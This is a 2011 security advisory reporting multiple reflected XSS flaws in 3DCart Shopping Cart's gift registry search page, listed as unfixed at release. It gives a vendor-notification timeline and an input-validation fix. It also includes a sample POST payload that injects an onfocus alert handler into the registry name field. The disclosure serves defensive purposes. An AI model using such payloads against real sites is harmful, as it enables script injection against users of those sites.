# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 1/2011

============ { Ariko-Security - Advisory #1/1/2011 } =============

3DCart Shopping Cart Software multiple XSS vulnerabilities

Vendor's description of software and download:
# http://www.3dcart.com/

Dork:
# N/a

Application Info:
# 3DCart Shopping Cart (PCI COMPLIANT)
# Last January 2011

Vulnerability Info:
# Type: XSS

Time Table:
# 14/12/2010 - Vendor notified
# 06/01/2011 - Release Date. (not fixed)

XSS:
#Input passed to the "txtRegName" , "txtRegFirstName" ,"txtRegLastName" parameters in giftregistry_home.asp is not properly sanitised before being returned to the user.

Sample POC:
#http://server/giftregistry_home.asp
POST: action=search&intCustId=&txtRegName=12345%22+oNfOcUs%3dalert(33778)+%22&drpRegMonth=&drpRegDay=&drpRegYear=&txtRegFirstName=12345&txtRegLastName=12345

Solution:
# Input validation of vulnerable parameters should be corrected.

Credit:
# Discoverd By: Ariko-Security 2010